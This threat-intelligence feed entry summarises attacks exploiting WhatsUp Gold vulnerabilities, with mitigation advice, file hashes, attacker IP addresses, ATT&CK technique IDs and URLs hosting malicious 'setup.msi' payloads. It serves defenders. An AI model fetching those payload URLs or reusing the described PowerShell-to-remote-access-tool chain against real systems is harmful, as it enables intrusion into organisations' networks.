Protecting Against RCE Attacks Abusing WhatsUp Gold Vulnerabilities
Sept. 18, 2024, 9 a.m.
Tags
External References
Description
Trend Micro researchers identified remote code execution attacks on WhatsUp Gold exploiting the Active Monitor PowerShell Script since August 30. These attacks possibly leveraged vulnerabilities CVE-2024-6670 and CVE-2024-6671, which were patched on August 16. The timeline suggests that some organizations were unable to apply patches quickly, leading to incidents immediately following the PoC's publication. Attackers abused NmPoller.exe to execute PowerShell scripts, downloading various remote access tools and attempting to gain persistence. Mitigation steps include keeping services under access control, immediate patch application, and monitoring suspicious process creation events in WhatsUp Gold environments.
Date
Published: Sept. 18, 2024, 8:29 a.m.
Created: Sept. 18, 2024, 8:29 a.m.
Modified: Sept. 18, 2024, 9 a.m.
Indicators
f1c68574167eaea826a90595710e7ee1a1e75c95433883ce569a144f116e2bf4
992974377793c2479065358b358bb3788078970dacc7c50b495061ccc4507b90
6daa94a36c8ccb9442f40c81a18b8501aa360559865f211d72a74788a1bbf3ce
185.123.100.160
45.227.255.216
https://fedko.org/wp-includes/ID3/setup.msi
http://45.227.255.216:29742/ddQCz2CkW8/setup.msi
http://185.123.100.160/access/Remote
Attack Patterns
Splashtop Remote
SimpleHelp Remote Access
Radmin
Atera Agent
T1505.003
T1059.001
T1571
T1105
T1543
T1190
T1133
T1078
CVE-2024-6671
CVE-2024-6670
CVE-2024-4885